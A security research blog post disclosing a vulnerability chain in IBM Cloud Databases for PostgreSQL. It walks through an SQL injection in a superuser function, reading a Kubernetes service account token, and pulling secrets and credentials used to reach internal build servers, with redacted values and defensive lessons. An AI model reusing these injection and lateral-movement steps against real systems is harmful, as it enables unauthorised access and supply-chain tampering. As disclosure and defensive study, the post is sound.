Hell’s Keychain: Supply-chain vulnerability in IBM Cloud Databases for PostgreSQL allows potential unauthorized database access

How IBM Cloud caught us exploring its infrastructure and how a hardcoded secret eventually led to build artifact access and manipulation


In this blog post, we demonstrate how we leveraged a privilege escalation vulnerability in PostgreSQL to uncover a long-lived secret that could have been abused to authenticate to internal IBM Cloud CI/CD services and tamper with IBM Cloud’s internal image building process, potentially exposing its customers to a supply-chain attack. Wiz and IBM Cloud worked closely together to fix this issue. Read IBM Cloud's advisory here.

I greatly appreciate the partnership and professionalism of Wiz’s security research team and look forward to future collaboration. Their diligence and creativity are helping to make clouds a safer place to operate IT.

Jerry Bell, CISO of IBM Cloud

TL;DR

Wiz Research found Hell’s Keychain, a first-of-its-kind, cloud service provider supply-chain vulnerability in IBM Cloud Databases for PostgreSQL. The vulnerability consists of a chain of three exposed secrets (Kubernetes service account token, private container registry password, CI/CD server credentials) coupled with overly permissive network access to internal build servers. This attack vector could allow malicious actors to remotely execute code in customers’ environments to read and modify the data stored in the PostgreSQL database.  

After Wiz disclosed its findings, IBM Cloud patched the vulnerability for all its customers. No customer action is required. IBM Cloud stated there is no indication that IBM Cloud systems or services were exploited further or by other parties. 

Hell’s Keychain illustrates how plaintext credentials scattered across your environment can pose a huge risk to your organization by undermining its integrity and tenant isolation. Moreover, the vulnerability emphasizes the need for strict network controls and demonstrates how pod access to the Kubernetes API is a common misconfiguration that can result in unrestricted container registry exposure and scraping.

Ultimately, Hell’s Keychain underscores the importance of proactive cloud vulnerability research, responsible disclosure, and public tracking of cloud vulnerabilities for cloud security.

Figure 1: Executing the supply-chain attack (GIF)

What is Hell’s Keychain?

In August 2022, Wiz Research found Hell’s Keychain, a supply-chain vulnerability in IBM Cloud Databases for PostgreSQL. The vulnerability consists of a chain of three exposed secrets coupled with overly permissive network access to internal build servers. To our knowledge, this is a first-of-its-kind supply-chain attack vector impacting a cloud provider’s infrastructure. Hell’s Keychain reinforces the importance of proper secrets management, network controls, and tenant isolation, especially in large and complex cloud environments.

The discovery of Hell’s Keychain was based in part on previous Wiz research that uncovered a class of PostgreSQL vulnerabilities affecting most cloud vendors, such as Microsoft Azure and Google Cloud Platform.

Cloud service provider supply-chain attack vector

Hell’s Keychain reflects a novel attack vector in the cloud, in which a cloud service provider’s build process is compromised via its supply chain. This is not a single isolated case but a broader problem within the security community: we have repeatedly carried out attacks similar to Hell's Keychain across several providers.

In our experience, the recipe for a cloud service provider (CSP) supply-chain attack features two ingredients: the forbidden link and the keychain. The forbidden link represents network access—specifically, it is the link between a production environment and its build environment. The keychain, on the other hand, symbolizes the collection of one or more scattered secrets the attacker finds throughout the target environment. Although both components are individually unhygienic, they form a fatal compound when combined.

The keychain

In Hell’s Keychain, the keychain held three secrets, which were a Kubernetes service account token, a private container registry password, and CI/CD server credentials. When combined with the forbidden link between our personal PostgreSQL instance and IBM Cloud Databases’ build environment, this keychain enabled us to authenticate to IBM Cloud’s internal build servers and manipulate its artifacts.

Figure 2: Obtaining the keychain (GIF)

Getting the 1st key — Kubernetes service account token

At this early stage in the research process, our goal was the same as in every PostgreSQL-as-a-Service audit we do: to find a way to escalate our privileges within the PostgreSQL instance to a superuser. Once we become superuser, it should be relatively straightforward to execute arbitrary code on the underlying virtual machine and continue challenging internal security boundaries from there.

In the case of IBM Cloud, we found multiple ways to do so. Some were variants of vulnerabilities that worked for us in the past on other cloud vendors (which we will soon publish), and some were unique to IBM Cloud.

PostgreSQL privilege escalation via SQL Injection 

One of the features IBM Cloud offers its managed PostgreSQL customers is Logical Replication. Behind the scenes, it is implemented with numerous PostgreSQL functions in the database, one of which is create_subscription. This function is owned by the ibm user (a superuser in the database) and is marked SECURITY DEFINER, which means it runs with the privileges of its owner rather than those of the caller. Looking at the code, we noticed an SQL injection vulnerability that allows arbitrary queries to be executed as a superuser (the ibm user):

CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text) 
    RETURNS text 
    LANGUAGE 'plpgsql' 
    VOLATILE SECURITY DEFINER 
    PARALLEL UNSAFE 
    COST 100 
     
AS $BODY$ 
                DECLARE 
                     persist_dblink_extension boolean; 
                BEGIN 
                    persist_dblink_extension := create_dblink_extension(); 
                    PERFORM dblink_connect(format('dbname=%s', db_name)); 
                    PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s', 
                                               subscription_name, host_ip, portNum, password, username, db_name, publisher_name)); 
                    PERFORM dblink_disconnect(); 

The arguments passed to this function were not sanitized properly before executing the dblink_exec function. This means that we could supply our arbitrary input to the create_subscription function, thereby injecting our own SQL query into the privileged SQL query that was going to be executed as a superuser. To demonstrate this, we ran a query that showed the name of the user running it: 

INSERT INTO public.test3(data) VALUES(current_user);

We then wrote an SQL query that exploited the SQL injection: 

Figure 3: Successfully exploiting the SQL Injection to elevate to a `superuser`

The underlying query that was executed by the create_subscription was: 

CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a 
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication 
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
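The mechanics of the injection can be reproduced outside the database. The following is a minimal Python sketch, not IBM Cloud's code: build_subscription_sql imitates the %s interpolation seen in create_subscription, the payload value is our assumption about what was passed as publisher_name (inferred from the executed query above), and quote_ident is a simplified stand-in for the identifier quoting that PostgreSQL's format() applies with %I.

```python
def build_subscription_sql(subscription_name, host_ip, portnum, password,
                           username, db_name, publisher_name):
    """Imitate the %s-style interpolation used inside create_subscription."""
    return (
        "CREATE SUBSCRIPTION %s CONNECTION 'host=%s port=%s password=%s "
        "user=%s dbname=%s sslmode=require' PUBLICATION %s"
        % (subscription_name, host_ip, portnum, password, username,
           db_name, publisher_name)
    )


def quote_ident(name):
    """Simplified stand-in for PostgreSQL identifier quoting (format's %I)."""
    return '"' + name.replace('"', '""') + '"'


# Assumed payload: everything after the first semicolon is a second statement.
payload = ("test2_publication WITH (create_slot = false); "
           "INSERT INTO public.test3(data) VALUES(current_user);")

# Verbatim interpolation: the extra statement becomes part of the query text.
unsafe_sql = build_subscription_sql(
    "test3", "127.0.0.1", "5432", "a", "ibm", "ibmclouddb", payload)

# Quoted interpolation: the whole payload is treated as one (odd) identifier.
safe_sql = build_subscription_sql(
    "test3", "127.0.0.1", "5432", "a", "ibm", "ibmclouddb",
    quote_ident(payload))

print(unsafe_sql)
print(safe_sql)
```

In the quoted variant, the payload can no longer terminate the statement, so the query would most likely fail on a nonexistent publication name instead of running the INSERT. The sketch quotes only publisher_name; the other arguments, in particular those embedded in the connection string, would need their own escaping.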

Having acquired the power of executing queries as a superuser, we leveraged the PostgreSQL COPY statement to execute arbitrary commands on the underlying virtual machine hosting our database instance.

Figure 4: Executing the `id` command on the underlying virtual machine hosting our PostgreSQL instance

Reconnaissance

After executing code on the underlying compute instance that runs our managed PostgreSQL database, we decided to map the internal environment to understand the extent of the service’s resilience and uncover new attack surfaces.

We invoked a reverse shell and started to explore our environment. We began by issuing our elementary recon commands: observing the machine’s process list, its active connections, and the /etc/passwd file. We then took more proactive measures and initiated a broad port scan in the internal environment of the IBM Cloud PostgreSQL service.

This is when we received a message from IBM Cloud’s partnership team stating that our research once again triggered some alerts that caught the attention of the security team. After discussing our work and sharing our thoughts with them, they kindly gave us permission to pursue our research and further challenge security boundaries, reflecting the organization's healthy security culture.

K8s environment

With IBM Cloud’s blessing, we continued to explore the compute instance’s environment. While examining the environment variables, we noticed a few that indicated we were running inside a Kubernetes pod container (e.g. the POD_NAME variable):

KUBERNETES_PORT=tcp://172.21.0.1:443 
POD_NAME=c-84aa5d80-ef9b-440e-b4f8-31fd782118b2-m-1 
KUBERNETES_SERVICE_PORT=443 

The fact that we were operating in a Kubernetes cluster got us wondering whether the cluster was dedicated to our account or shared between customers. We maintained our recon efforts and found a Kubernetes API token in the /var/run/secrets/kubernetes.io/serviceaccount/token file. Using that token, we could access the Kubernetes API.
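To illustrate what "using that token" involves, here is a hedged Python sketch that builds, but does not send, an authenticated request to the Kubernetes API. The function names are ours; the sketch assumes the API server address can be derived from the KUBERNETES_PORT variable shown above and that the token is presented as a standard Bearer token.

```python
import urllib.request
from urllib.parse import urlparse

# Standard mount point for a pod's service account files.
SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"


def api_base_url(env):
    """Derive the API server URL from KUBERNETES_PORT (tcp://host:port)."""
    parsed = urlparse(env["KUBERNETES_PORT"])
    return "https://%s:%d" % (parsed.hostname, parsed.port)


def build_pod_list_request(env, token, namespace):
    """Build (without sending) an authenticated request that lists pods."""
    url = "%s/api/v1/namespaces/%s/pods" % (api_base_url(env), namespace)
    return urllib.request.Request(
        url, headers={"Authorization": "Bearer " + token.strip()})


def load_in_pod_credentials():
    """Read the token and namespace files; only meaningful inside a pod."""
    with open(SA_DIR + "/token") as fh:
        token = fh.read()
    with open(SA_DIR + "/namespace") as fh:
        namespace = fh.read().strip()
    return token, namespace
```

Sending the request additionally requires trusting the cluster CA, which is normally mounted next to the token as ca.crt. From a defender's perspective, the takeaway is that any process able to read this directory can speak to the API with the pod's identity.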

Subsequently uploading the kubectl utility to the instance allowed us to use its features and perform operations more rapidly. We then ran the can-i command to inspect our current privileges and available resources and saw that we had access to secrets, pods, and custom IBM Cloud resources in our namespace:

./kubectl auth can-i --list 
Resources                                          Verbs 
selfsubjectaccessreviews.authorization.k8s.io      [create] 
selfsubjectrulesreviews.authorization.k8s.io       [create] 
secrets                                            [get create update] 
pods                                               [get patch update list] 
endpoints                                          [get patch update] 
configmaps                                         [get patch] 
... 
deployments.apps                                   [get] 
replicasets.apps                                   [get] 
statefulsets.apps                                  [get] 
formations.crd.compose.com                         [get] 
backups.crd.compose.com                            [patch delete list get] 
buckets.crd.compose.com                            [patch] 
podsecuritypolicies.policy                         [use] 
podsecuritypolicies.policy                         [use] 
securitycontextconstraints.security.openshift.io   [use] 
recipes.crd.compose.com                            [watch get update create patch list delete] 
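A listing like this is easier to review when the sensitive grants are pulled out automatically. The sketch below is one possible approach in Python; it assumes the abbreviated two-column layout shown above (real kubectl output contains additional columns), and the SENSITIVE table is a hypothetical policy of ours, not an official list.

```python
import re

# Matches rows such as: "secrets      [get create update]"
ROW = re.compile(r"^(\S+)\s+\[([^\]]*)\]$")

# Hypothetical policy: verbs on these resources deserve a closer look.
SENSITIVE = {
    "secrets": {"get", "list", "watch"},
    "pods": {"create", "patch", "update"},
}


def parse_can_i(text):
    """Map each resource to the set of verbs granted on it."""
    grants = {}
    for line in text.splitlines():
        match = ROW.match(line.strip())
        if match:
            resource, verbs = match.groups()
            grants.setdefault(resource, set()).update(verbs.split())
    return grants


def risky_grants(grants):
    """Return the sensitive verbs that are actually granted, per resource."""
    found = {}
    for resource, verbs in SENSITIVE.items():
        hit = grants.get(resource, set()) & verbs
        if hit:
            found[resource] = sorted(hit)
    return found


sample = """\
Resources                                          Verbs
secrets                                            [get create update]
pods                                               [get patch update list]
configmaps                                         [get patch]
"""

print(risky_grants(parse_can_i(sample)))
```

Note that get on secrets is flagged even without list: as the next section shows, reading a secret only requires knowing its name.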

When we listed the pods in our namespace, we saw dozens of other pods running more PostgreSQL instances. They all appeared to belong to our account:

Figure 5: Using `kubectl` to list available pods

At this stage of our research, we were still unsure whether namespace separation was the only security barrier used to enforce tenant isolation, so we kept digging.

Getting the 2nd key — Container registry password

When creating a Kubernetes pod with an image from a private container registry, it is necessary to supply the imagePullSecrets field in the pod configuration, which references a secret holding the credentials for the container registry.

Container registry scraping

Over the past year, we have experimented with container registry scraping as a technique to help us move laterally within cloud environments. It has proven to be effective on several occasions.

In K8s clusters, container registry scraping is a reliable technique for performing lateral movement since it exploits a highly prevalent misconfiguration we’ve observed across CSPs and customers’ cloud environments. The first step is contacting the K8s server and finding the container registry address. Then, you have a couple of options depending on the registry’s configurations:

  • If the registry is public, you can start pulling images and scanning them for internal source code, artifacts, and scattered credentials.

  • If the registry requires authentication but you can successfully retrieve imagePullSecrets, you can proceed with image pulling and scanning.

    • Failure to retrieve imagePullSecrets, however, prevents you from moving forward in the process.

In Hell’s Keychain, the container registry required authentication. Although we didn’t have list permission for secrets in our namespace, we did have get permission. This meant that we could only get secrets if we knew their names. In an attempt to find these names in our cluster, we listed the pods' configurations with the following command:

kubectl get pods -o json

We found that IBM Cloud pulled custom images from a private container registry whose credentials were found in the pipeline secret.

"imagePullSecrets": [ 
          { 
            "name": "pipeline" 
          } 
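Finding secret names this way is simple to automate. As a rough illustration in Python, assuming the JSON document has the usual pod-list shape (an items array whose entries carry spec.imagePullSecrets), the names can be collected as follows; the function name and sample data are ours.

```python
import json


def pull_secret_names(pod_list_json):
    """Collect distinct imagePullSecrets names from a pod list document."""
    doc = json.loads(pod_list_json)
    names = set()
    for pod in doc.get("items", []):
        # The field is optional, so tolerate pods that omit it.
        for ref in pod.get("spec", {}).get("imagePullSecrets") or []:
            names.add(ref["name"])
    return sorted(names)


# Made-up sample mirroring the structure of `kubectl get pods -o json`.
sample = json.dumps({
    "kind": "List",
    "items": [
        {"spec": {"imagePullSecrets": [{"name": "pipeline"}]}},
        {"spec": {"imagePullSecrets": [{"name": "pipeline"}]}},
        {"spec": {}},
    ],
})

print(pull_secret_names(sample))
```

The same listing is useful defensively: every name it returns is a secret that any identity with get permission on secrets in the namespace can read.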

Now that we had the secret’s name, we could get its content.

kubectl get secrets -o json pipeline  
{  
    "apiVersion": "v1",  
    "data": {  
        ".dockerconfigjson": "**REDACTED**"  
    },  
    "kind": "Secret",  
    "metadata": {  
        "annotations": {  
            "meta.helm.sh/release-name": "**REDACTED**",  
            "meta.helm.sh/release-namespace": "default"  
        },  
        "creationTimestamp": "2022-04-19T11:54:23Z",  
        "labels": {  
            "app.kubernetes.io/managed-by": "Helm"  
        },  
        "name": "pipeline",  
        "namespace": "3337e1322e274c2298c0d78f3b2c0d60",  
        "resourceVersion": "1993710167",  
        "uid": "076f9687-8c1d-4674-a9bf-bd869b25a6b5"  
    },  
    "type": "kubernetes.io/dockerconfigjson"  
}  

After Base64-decoding the .dockerconfigjson property, we revealed a set of four credentials that could be used to access multiple container registries:

{  
    "auths": {  
        "de.icr.io": {  
            "auth": "**REDACTED**"  
        },  
        "private.de.icr.io": {  
            "auth": "**REDACTED**"  
        },  
        "registry.ng.bluemix.net": {  
            "auth": "**REDACTED**"  
        },  
        "us.icr.io": {  
            "auth": "**REDACTED**"  
        }  
    }  
}  

Our query of IBM Cloud's IAM API revealed that this was an API key capable of accessing IBM Cloud’s Container Registry Images that appeared to have read-write authorization!

Figure 6: Querying IBM Cloud’s IAM API regarding the retrieved key

We then used the ibmcloud-cli to log in to the specific container registry with this key.

Figure 7: Using the retrieved key to log in via ibmcloud-cli
Figure 8: Using the retrieved key to log in to the container registry
Figure 9: Listing the namespaces available with the retrieved key

Despite the alleged read-write permissions, when we attempted to use the key to push a new dummy image to the container registry, we encountered a permission denied error. The key’s description was unfortunately (for us) inaccurate.

Figure 10: Failing to push a new image to the container registry

Although these findings did not pose an immediate threat to IBM Cloud’s customers, we still considered them severe. Had a malicious actor obtained these credentials, they could have pulled and explored hundreds of images belonging to IBM Cloud’s managed database services.

Container images typically hold proprietary source code and binary artifacts that are the company’s intellectual property. They can also contain information that an attacker could leverage to find additional vulnerabilities and perform lateral movement within the service’s internal environment. Finally, container images often include sensitive secrets that can compromise other resources in the victim’s environment.

Getting the 3rd key — CI/CD server credentials

Plaintext secrets in container images’ metadata

Each container that is deployed in our environment is based on a custom image that was built by IBM Cloud. After seeing the potential impact of misconfigured credentials in the previous step, we concluded that our next move should be scanning the images for secrets that could have been forgotten during the build process. Although we had access to hundreds of images, we only pulled those we found running in our namespace (postgresql-db-12.7, etcd-mgmt-3.2.7, etcd-portal-3.2.7, etcd-portalmgmt-3.2.7, postgresql-mgmt-12.7) and utilized Yelp's detect-secrets tool to scan them for secrets.

In order to comprehensively scan for secrets, we unpacked the images and examined the combination of files that made up each image. Container images are based on one or more layers; each may inadvertently include secrets. For example, if a secret exists in one layer but is deleted from the following layer, it would be completely invisible from within the container. Scanning each layer separately may therefore reveal additional secrets. Owing to this approach, we discovered multiple sensitive secrets in overlooked files:

./etcd-db-3.2.7/5f58fdb011ecb91851e15da48eb42753754db46690c657537007bcc1376ea7ff.json  
./etcd-mgmt-3.2.7/033093941e82efee469a858f99a8e6dfa33110da15b362bf3cab418b75cef1bd.json  
./etcd-portal-3.2.7/7c57a500fac4fc4bf9cdb56e1e91a80da691b68f770f12c2eb2d0dc673f21417.json  
./etcd-portalmgmt-3.2.7/4f4a7c7fd8d3d5f80c5169a5213fe3654bc63911c160a26b69afc00c0de14869.json  
./postgresql-db-12.7/f6cb8f69fe9743f19bce248a668213031db4de469af44cf8a20c59b881fe5807.json  
./postgresql-mgmt-12.7/9ffe9a0b853bc33ec6faf354017273624f9f2604f53ed89b5814c2cdfd3afe0a.json  

These files are the images’ manifest files and contain a history section documenting historical commands that were executed during the image build process. The commands include pulling artifacts from IBM Cloud internal repositories, where the password for the internal repository was provided as a command-line parameter.

Here is one of the build commands as it originally appeared in the container images’ metadata history section: 

**REDACTED**_REPO_GENERIC=**REDACTED** 
**REDACTED**_TOKEN=**REDACTED** 
**REDACTED**_USERNAME=**REDACTED**@nomail.relay.ibm.com 
FTP3PASS=**REDACTED** FTP3USER=**REDACTED**@us.ibm.com 
/bin/sh -c curl -sLO  https://`echo ${**REDACTED** _USERNAME} | sed 
s/@/%40/g`:${**REDACTED** _TOKEN}@**REDACTED** ${**REDACTED** 
_REPO_GENERIC}/get-pip.py && python3 get-pip.py && rm get-pip.py  
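A check for this kind of leak can be scripted against an image's configuration JSON. The Python sketch below is only a heuristic of ours, not the detect-secrets implementation: it assumes the standard history array with created_by entries and flags NAME=value pairs whose name hints at a credential. The sample values are made up.

```python
import json
import re

# Heuristic (an assumption): variable names containing these words are suspect.
ASSIGNMENT = re.compile(
    r"\b([A-Za-z0-9_]*(?:TOKEN|PASS|SECRET|KEY)[A-Za-z0-9_]*)=(\S+)")


def secrets_in_history(config_json):
    """Return (variable name, history index) for suspicious build arguments."""
    config = json.loads(config_json)
    findings = []
    for index, step in enumerate(config.get("history", [])):
        for name, _value in ASSIGNMENT.findall(step.get("created_by", "")):
            findings.append((name, index))
    return findings


# Made-up image config with one leaky build step and one harmless step.
sample_config = json.dumps({
    "history": [
        {"created_by": "|2 DEMO_TOKEN=abc123 FTP3PASS=hunter2 /bin/sh -c "
                       "curl -sLO https://example.test/get-pip.py"},
        {"created_by": "/bin/sh -c apt-get update"},
    ]
})

print(secrets_in_history(sample_config))
```

Running a check like this in the build pipeline, before an image is pushed, catches credentials passed as build arguments even when no file in the final filesystem contains them.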

Using these files, we revealed the credentials for several IBM Cloud internal services, including:

  • FTP credentials

  • Internal artifact repository credentials

With these keys gathered on the keychain, we knew which servers we could infiltrate. But this keychain was meaningless without the required network access.

The forbidden link

In order to determine which servers were most relevant to the image build process, we went back to examine the historical commands that were used to build the container’s image and learn which artifacts were involved. When we tried to access these servers from the machine hosting the PostgreSQL instance, we were shocked to learn that we had network access to internal IBM Cloud build servers! We then proceeded to authenticate to them using the artifact repository credentials, and in doing so successfully uncovered the forbidden link.

Combining the ingredients

The only way to determine whether the credentials we obtained allowed us to perform write operations against the repositories hosting the artifacts was to simply check.

To test our permissions, we created a few files in the repositories used in the build process of the PostgreSQL image. This proved that we could overwrite arbitrary files in the packages that would have been installed on every PostgreSQL instance, establishing the supply-chain attack path.

Summary

Our research into IBM Cloud Databases for PostgreSQL reinforced what we learned from other cloud vendors—that modifications to the PostgreSQL engine effectively introduced new vulnerabilities to the service. These vulnerabilities could have been exploited by a malicious actor as part of an extensive exploit chain culminating in a supply-chain attack on the platform.

In Hell’s Keychain, we used container registry scraping to recover internal source code and credentials, eventually gaining a key granting read-write access to internal trusted repositories.

Overly permissive network access also proved dangerous. By uncovering the forbidden link between IBM Cloud’s build environment and its customers’ production environments, we leveraged the necessary credentials to carry out Hell’s Keychain.

Finally, we were reminded of the value of secret scanning. Although in previous cases our team managed to violate tenant isolation by exploiting vulnerabilities in neighbor-tenant instances or the control plane, in the case of IBM Cloud Databases for PostgreSQL, the Achilles heel was improper secrets management. Regardless of how strong your organization’s security measures are, it faces a huge risk if plaintext credentials are scattered across its environment.

Lessons Learned

1. Constantly monitor your environment for scattered secrets

Forgotten secrets in cloud environments are a common security issue. These secrets are usually cloud access keys, passwords, CI/CD credentials, and API access tokens. A significant share of them are relics of the services' build and deployment processes. Over the past year of research across multiple cloud vendors, we have found sensitive secrets in numerous places, including Linux bash history and journal files that have remained in the servers' images since the build process. In addition, we learned that this issue is not unique to cloud computing: in the absence of best practices on how to deploy code or artifacts to cloud storage buckets, we often see customers accidentally upload their Git metadata (.git) and deployment-related files such as CircleCI configuration (.circleci/config.yml) to publicly accessible S3 buckets. Doing so can expose source code and access keys to anyone on the Internet.

2. Ensure your production environment has strict network controls

An established connection between the internet-facing environment and the organization’s internal network enables attackers to gain a deeper foothold and maintain persistence. These internal environments are typically less strictly configured than production environments.

In Hell’s Keychain, the lack of adequate network controls allowed us to uncover the forbidden link, a vital ingredient of a supply-chain attack. This misconfiguration is not unique to IBM Cloud, as we have observed it across several cloud providers and customers. In our view, this issue is overlooked in industry discussions and cloud security solutions.
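One way to look for such a link in your own environment is to test, from inside a production workload, whether build or CI/CD endpoints accept connections at all. The following Python sketch shows the idea; the function names are ours, and the list of targets to probe is something you would supply from your own inventory.

```python
import socket


def can_connect(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable networks.
        return False


def reachable_targets(targets, timeout=2.0):
    """Filter (host, port) pairs down to the ones that accept connections."""
    return [t for t in targets if can_connect(t[0], t[1], timeout)]
```

Any build server that shows up in the result when the check runs from a customer-facing workload is a candidate forbidden link, regardless of whether valid credentials are available.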

3. Configure your container registry to prevent malicious actors from scraping it

Misconfigured container registries are a prevalent issue across cloud providers’ and customers’ environments. By using container registry scraping, attackers can gain the tools required to move laterally throughout the environment. Make sure your container registry solutions enforce proper access controls and scoping.

Responsible Disclosure

We disclosed our findings to IBM Cloud in the form of a three-part report. IBM Cloud rapidly investigated and fixed the vulnerabilities and security issues we discovered. We enjoyed working with IBM Cloud’s security team, which took the issues very seriously and addressed them promptly and professionally.

Disclosure Timeline

19/04/2022 – Wiz started researching IBM Cloud Databases
19/04/2022 – Wiz found multiple security issues in IBM Cloud Databases for PostgreSQL
20/04/2022 – IBM Cloud’s security team detected Wiz’s activity and asked to halt the research
24/04/2022 – Wiz shared a detailed report on the issues found
25/05/2022 – IBM Cloud acknowledged the report
14/07/2022 – IBM Cloud allowed Wiz to proceed with its research
24/08/2022 – Wiz reported the Kubernetes-related security issues
25/08/2022 – Wiz reported the secrets-related security issues
03/09/2022 – IBM Cloud fully mitigated all the reported issues

Tracking cloud vulnerabilities

Today, the security community has no clear, enforced process for handling cloud vulnerabilities. Cloud vulnerabilities are typically not issued CVEs, so they are very hard for customers to track. Recently, researchers from Wiz along with other cloud security community members initiated the Open Cloud Vulnerability & Security Issue Database to help cloud users and defenders monitor and track cloud vulnerabilities. Hell's Keychain was added to the database as part of this effort. If you are interested in contributing, you can check out the OpenCVDB GitHub repository.

Stay in touch!

Hi there! We are Ronen Shustin (@ronenshh), Shir Tamari (@shirtamari), Nir Ohfeld (@nirohfeld), and Sagi Tzadik (@sagitz_) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors. We would love to hear from you! Feel free to contact us on Twitter or via email: research@wiz.io.

